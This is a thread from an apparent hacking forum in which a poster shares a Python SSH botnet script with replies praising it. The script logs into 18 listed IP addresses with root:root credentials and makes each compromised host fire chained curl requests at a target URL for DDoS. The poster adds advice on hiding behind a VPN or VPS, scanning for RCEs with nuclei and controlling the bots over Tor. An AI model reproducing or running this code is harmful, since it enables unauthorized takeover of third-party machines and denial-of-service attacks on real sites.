[PoC] Honeypot Botnet - Weaponizing Honeypots
by viceCoolMan - Wednesday January 1, 2025 at 06:01 PM
I Did It My Way

Posts: 217
Threads: 65
Joined: Aug 2024
Reputation: 467

LeakerHackerCoderShoutbox AddictTwitter
#1
01-01-2025, 06:01 PM
Here's a simple SSH botnet made from honeypots.

Numerous honeypots are linked to the intranet, some intentionally designed for hacking. During my investigation into the cracked SSH credentials, I discovered that curl was enabled. By concatenating curl commands, I was able to amplify the DDOS capability. Please use a VPN or VPS while running this script.


Possible improvements:  Because the bots are honeypots, you can try running nuclei with the -t CVES/ option to look for web-based RCEs. This could allow you to use Tor to send commands instead of SSH.

import concurrent.futures
import time

from paramiko import SSHClient, AutoAddPolicy


class botnet:
    def __init__(self, url: str):
      self.url = url
      self.bots = ["172.105.7.122","208.83.238.82","174.138.9.176","139.162.118.148","45.33.22.76","143.42.63.163","139.144.26.91","139.144.26.14","139.144.26.231","143.42.229.125","143.42.229.113","139.180.206.8","194.68.44.161","139.144.26.71","143.42.229.133","45.79.141.174","143.42.229.124","143.42.229.140"]
      self.threads = 5#len(self.bots)
      self.requests = 10

      self.active = []

   def task(self, bot_ip):

      try:

         client = SSHClient()
         client.set_missing_host_key_policy(AutoAddPolicy())
         client.connect(bot_ip, username='root', password='root', timeout=10)

         channel = client.invoke_shell()
         channel.recv(1024)
         channel.send('id')
         output = channel.recv(1024)

         if "root" in output.decode():
            channel.close()
            print(f"Connected to Bot {bot_ip}")
            botnet_string = f"curl {self.url} ;"

            #this improvement will concatinat the commands so we only have to sent 1 instead of 10 ssh requests for 10 packets
            for cycle in range(1, self.requests):
               botnet_string += botnet_string

            stdin, stdout, stderr = client.exec_command(botnet_string)
            client.close()
         else:
            pass
         client.close()
      except Exception as e:
         #print(e)
         #print(f"{bot_ip} Didn't connect")
         pass

   def machineGun(self):
      with concurrent.futures.ThreadPoolExecutor(max_workers=self.threads) as executor:
         futures = [executor.submit(self.task, x.strip()) for x in self.bots]


def main():
   t = botnet("https://www.google.com")
   for _ in range(10):
      t.machineGun()

if __name__ == "__main__":
   main()
This forum account is currently banned. Ban Length: (Permanent)
Ban Reason: Self-Ban | http://breached26tezcofqla4adzyn22notfqw...an-Appeals if you wish to be unbanned in the future.
Reply
1337
DWC
Posts: 276
Threads: 110
Joined: Aug 2023
Reputation: 753

HackerLeakerVIP GifterShoutbox Addict
#2
01-01-2025, 06:06 PM
very good PoC, GLWS!
My telegram got banned! contact me via PM


xmpp (Jabber): 303@thesecure.biz
Reply
Flipping over Hyundai Elantra's
user_5973
Posts: 310
Threads: 6
Joined: Jun 2023
Reputation: 1,493

Shoutbox Addict
#3
01-01-2025, 06:49 PM
That looks veryy good
Hidden Content
Website
Reply
Breached
Member
Posts: 8
Threads: 0
Joined: Apr 2024
Reputation: 0
#4
01-09-2025, 07:03 AM
Wow!, good to learn.
Reply
VIP User
VIP
Posts: 79
Threads: 13
Joined: Aug 2024
Reputation: 413

Confirmed Grill
#5
01-16-2025, 10:43 AM
This is a Good topic . Nice share @viceCoolManpawskate
I Love Data
[Image: Capture.png]
I am gonna be  a criminal , Hehehe
Reply


Forum Jump:


 Users browsing this thread: